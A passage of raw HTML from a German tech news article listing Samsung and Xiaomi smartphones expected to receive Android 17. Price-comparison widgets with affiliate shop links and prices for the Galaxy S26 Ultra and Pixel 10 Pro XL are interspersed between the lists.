							<a class="price-comparison__view-button" href="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/de/config/pixel_10_pro?hl=de&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiY0dsNFpXeGZNVEJmY0hKdiIsInZhcmlhbnRzIjpbWyI3IiwiTVRNPSJdXX0%3D" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/de/config/pixel_10_pro?hl=de&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiY0dsNFpXeGZNVEJmY0hKdiIsInZhcmlhbnRzIjpbWyI3IiwiTVRNPSJdXX0%3D" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Google" aria-label="Deal anschauen bei Google für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Samsung</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf0b20d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Samsung-Galaxy-S26-Ultra-review-7.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Samsung Galaxy S26 Ultra review 7" class="wp-image-3082181" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Samsung versorgt seine aktuellen Smartphones länger mit Updates als eigentlich vorgeschrieben. Die Top-Modelle bekommen heute bis zu sieben Generationen an Android-Upgrades, einige A-Modelle zumindest für sechs Generationen.</p>



<p>Für einige Budget-Modelle fehlen genaue Angaben. Nach unserem Stand müssten diese Samsung-Smartphones aber Android 17 erhalten:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3108173/samsung-galaxy-s26-test.html" target="_blank" rel="noreferrer noopener">Galaxy S26</a> / <a href="https://www.pcwelt.de/article/3084364/samsung-galaxy-s26-plus-test.html" target="_blank" rel="noreferrer noopener">S26+</a> / <a href="https://www.pcwelt.de/article/3084372/samsung-galaxy-s26-ultra-test-2.html" target="_blank" rel="noreferrer noopener">S26 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2898610/galaxy-s25-fe-hands-on.html" target="_blank" rel="noreferrer noopener">Galaxy S25 FE</a></li>



<li><a href="https://www.pcwelt.de/article/2800144/samsung-galaxy-s25-edge-test.html" target="_blank" rel="noreferrer noopener">Galaxy S25 Edge</a></li>



<li><a href="https://www.pcwelt.de/article/2604993/samsung-galaxy-s25-test.html" target="_blank" rel="noreferrer noopener">Galaxy S25</a> / <a href="https://www.pcwelt.de/article/2625286/samsung-galaxy-s25-plus-test.html" target="_blank" rel="noreferrer noopener">S25+</a> / <a href="https://www.pcwelt.de/article/2605138/samsung-galaxy-s25-ultra-test-2.html" target="_blank" rel="noreferrer noopener">S25 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2471013/samsung-galaxy-s24-fe-vorgestellt-3-wichtige-upgrades-fuer-das-guenstigere-modell.html" target="_blank" rel="noreferrer noopener">Galaxy S24 FE</a></li>



<li><a href="https://www.pcwelt.de/article/2287812/samsung-galaxy-s24-test.html" target="_blank" rel="noreferrer noopener">Galaxy S24 </a>/ <a href="https://www.pcwelt.de/article/2285159/samsung-galaxy-s24-plus-test.html" target="_blank" rel="noreferrer noopener">S24+</a> / <a href="https://www.pcwelt.de/article/2220194/samsung-galaxy-s24-ultra-test.html" target="_blank" rel="noreferrer noopener">S24 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/1486833/samsung-galaxy-s23-ultra-test.html" target="_blank" rel="noreferrer noopener">Galaxy S23 / S23+</a> / <a href="https://www.pcwelt.de/article/1506767/samsung-galaxy-s23-ultra-im-test.html" target="_blank" rel="noreferrer noopener">S23 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/3119761/samsung-galaxy-a57-test.html" target="_blank" rel="noreferrer noopener">Galaxy A57</a></li>



<li><a href="https://www.pcwelt.de/article/3140779/samsung-galaxy-a37-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A37</a></li>



<li><a href="https://www.pcwelt.de/article/2969981/samsung-galaxy-a17-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A17 5G</a></li>



<li><a href="https://www.pcwelt.de/article/2653268/samsung-galaxy-a16-test.html" target="_blank" rel="noreferrer noopener">Galaxy A16</a></li>



<li><a href="https://www.pcwelt.de/article/2262254/samsung-galaxy-a25-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A25</a></li>



<li>Galaxy A26</li>



<li><a href="https://www.pcwelt.de/article/2654481/samsung-galaxy-a36-test-2.html" target="_blank" rel="noreferrer noopener">Galaxy A36</a></li>



<li><a href="https://www.pcwelt.de/article/2771730/samsung-galaxy-a56-test-2.html" target="_blank" rel="noreferrer noopener">Galaxy A56</a></li>



<li>Galaxy A35</li>



<li>Galaxy A55</li>



<li><a href="https://www.pcwelt.de/article/1782064/samsung-galaxy-a54-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A54</a></li>



<li><a href="https://www.pcwelt.de/article/1813124/samsung-galaxy-a34-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A34</a></li>



<li>Galaxy M54</li>



<li>Galaxy M35</li>



<li><a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 7</a></li>



<li><a href="https://www.pcwelt.de/article/2843699/samsung-galaxy-z-flip-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 7</a></li>



<li><a href="https://www.pcwelt.de/article/2420827/samsung-galaxy-z-fold-6-test-nicht-neu-aber-definitiv-verbessert.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 6</a></li>



<li><a href="https://www.pcwelt.de/article/2408951/test-samsung-galaxy-z-flip-6-es-dreht-sich-alles-um-ki.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 6</a></li>



<li><a href="https://www.pcwelt.de/article/2033820/samsung-galaxy-z-fold-5-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 5</a></li>



<li><a href="https://www.pcwelt.de/article/2024386/samsung-galaxy-z-flip-5-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 5</a></li>
</ul>



<p><strong>Voraussichtlich kein Android-Update mehr: </strong>Galaxy S22 / S22+ / S22 Ultra, S21 FE, A53, A73, XCover 6 Pro, Z Fold4, Z Flip4.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/1204479/test-das-beste-samsung-galaxy-smartphone.html" target="_blank" rel="noreferrer noopener">Die besten Samsung Galaxy Smartphones aller Preisklassen im Test</a></p>



<p><strong>Samsung Galaxy S26 Ultra im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>979,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=RN9OriDYAtSgFdiMIpCMzM5qyWFNKPJzL7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260618&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=RN9OriDYAtSgFdiMIpCMzM5qyWFNKPJzL7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="979,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 979,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.011,46 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=nteUtzJg93Mgvrhhe5GGHeUBJoV6v8gA0WeqLN5e1NpD2eBKnwuxU1ONt2jyH31IhfEAy_wPG8EgFsXVqwGdMqJ9o1ONUu-LFMhaQPl9-p0k-uDdHhV-LorRx0ji2bv_B4ES914SkLk&amp;mid=686413404051&amp;id=686413404051&amp;ts=20260618&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=nteUtzJg93Mgvrhhe5GGHeUBJoV6v8gA0WeqLN5e1NpD2eBKnwuxU1ONt2jyH31IhfEAy_wPG8EgFsXVqwGdMqJ9o1ONUu-LFMhaQPl9-p0k-uDdHhV-LorRx0ji2bv_B4ES914SkLk&amp;mid=686413404051&amp;id=686413404051&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.011,46 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.011,46 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/12137.png" alt="Boomstore" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.151,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=t49twK2DUkrRDMrEUYsO-lVt6WZAp33caq82Pe-OiA11g7_hVoNHUliTBCp1hTCDqI4j3j7iWFlyDgZhaUo0f6m3nz8dOk09TWHqMtwqt_4DZX44FLpfzVJpxff84ORah4ES914SkLk&amp;mid=686110956402&amp;id=686110956402&amp;ts=20260618&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=t49twK2DUkrRDMrEUYsO-lVt6WZAp33caq82Pe-OiA11g7_hVoNHUliTBCp1hTCDqI4j3j7iWFlyDgZhaUo0f6m3nz8dOk09TWHqMtwqt_4DZX44FLpfzVJpxff84ORah4ES914SkLk&amp;mid=686110956402&amp;id=686110956402&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.151,00 €" data-vars-product-vendor="Boomstore" aria-label="Deal anschauen bei Boomstore für 1.151,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record amazon_forth_place ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-prime-logo.svg" alt="Amazon Prime" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.179,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="prime" data-vars-product-price="1.179,00 €" data-vars-product-vendor="Amazon Prime" aria-label="Deal anschauen bei Amazon Prime für 1.179,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.199,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="1.199,99 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.199,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/10729.png" alt="expert TechnoMarkt" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.379,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uyGu_6XD6dktiDOfdN0LnJe3tbSWKwr5Q-83Kv8zhzSEbEokfk-c7D__ecxGdSDN7oFn43uV-nFaEmlykUvpU5LdOrEl8NlozMdBY5bCkNVIsjqVD5uBARxBMizrH_m_OhOmf5U6z-u&amp;mid=686110970286&amp;id=686110970286&amp;ts=20260618&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uyGu_6XD6dktiDOfdN0LnJe3tbSWKwr5Q-83Kv8zhzSEbEokfk-c7D__ecxGdSDN7oFn43uV-nFaEmlykUvpU5LdOrEl8NlozMdBY5bCkNVIsjqVD5uBARxBMizrH_m_OhOmf5U6z-u&amp;mid=686110970286&amp;id=686110970286&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.379,00 €" data-vars-product-vendor="expert TechnoMarkt" aria-label="Deal anschauen bei expert TechnoMarkt für 1.379,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/9553666945" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/9553666945" data-vendor-api="shopping24" data-vars-product-price="1.429,99 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=sxs0D2FjMcqvsU1Wdh-mdc5Hd99OQeF7XC8OQBEBgUb0hMF-xhY9zlcjssOt7fkFYp5eUIvJnUoVAesFtOqK6FcYkEbUKExtLbV8fHNLNLuxIt7SrQig-xAvwtTYZ8iVzMdBY5bCkNVIsjqVD5uBAQJ9DaK675oNA&amp;mid=686084869391&amp;id=686084869391&amp;ts=20260618&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=sxs0D2FjMcqvsU1Wdh-mdc5Hd99OQeF7XC8OQBEBgUb0hMF-xhY9zlcjssOt7fkFYp5eUIvJnUoVAesFtOqK6FcYkEbUKExtLbV8fHNLNLuxIt7SrQig-xAvwtTYZ8iVzMdBY5bCkNVIsjqVD5uBAQJ9DaK675oNA&amp;mid=686084869391&amp;id=686084869391&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.429,99 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260618&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.429,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.449,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Hoe_p9pc_c0XVSmyu4TSBM21GiGtW1fN3jMdSHFwnS55p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dhlaFBJ0XOrvWrxaujk9KwO1U_NuDl7e7PN2szI6ujqvdsZLYOSPHISb_FqQXJxsbTJZvBxqRh5M&amp;mid=686061937859&amp;id=686061937859&amp;ts=20260618&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=Hoe_p9pc_c0XVSmyu4TSBM21GiGtW1fN3jMdSHFwnS55p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dhlaFBJ0XOrvWrxaujk9KwO1U_NuDl7e7PN2szI6ujqvdsZLYOSPHISb_FqQXJxsbTJZvBxqRh5M&amp;mid=686061937859&amp;id=686061937859&amp;ts=20260618&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.449,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.449,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/samsung-logo.svg" alt="Samsung" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.449,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-price="1.449,00 €" data-vars-product-vendor="Samsung" aria-label="Deal anschauen bei Samsung für 1.449,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Xiaomi</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf16a24"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/PXL_20260310_145909935.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Xiaomi 17 kameror" class="wp-image-3086446" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Xiaomi ist nicht immer eindeutig mit den eigenen Update-Versprechen. Es gibt aber noch viele aktuelle Geräte, die Teil des Update-Zyklus sein dürften.</p>



<p>Xiaomi liefert Android 17 daher voraussichtlich an folgende Geräte aus:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3078239/xiaomi-17-test.html" target="_blank" rel="noreferrer noopener">17</a> / Pro / Pro Max / <a href="https://www.pcwelt.de/article/3131894/xiaomi-17-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2635137/xiaomi-15-test.html" target="_blank" rel="noreferrer noopener">15</a> / <a href="https://www.pcwelt.de/article/2641294/xiaomi-15-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / Pro</li>



<li><a href="https://www.pcwelt.de/article/2924488/xiaomi-15t-test.html" target="_blank" rel="noreferrer noopener">15 T</a> / <a href="https://www.pcwelt.de/article/2924662/xiaomi-15t-pro-test-2.html" target="_blank" rel="noreferrer noopener">15 T Pro</a></li>



<li>15S Pro</li>



<li><a href="https://www.pcwelt.de/article/2250161/xiaomi-14-hands-on.html" target="_blank" rel="noreferrer noopener">14</a> / <a href="https://www.pcwelt.de/article/2313696/das-xiaomi-14-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / <a href="https://www.pcwelt.de/article/2489914/test-xiaomi-14t-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>14 T / 14 T Pro</li>



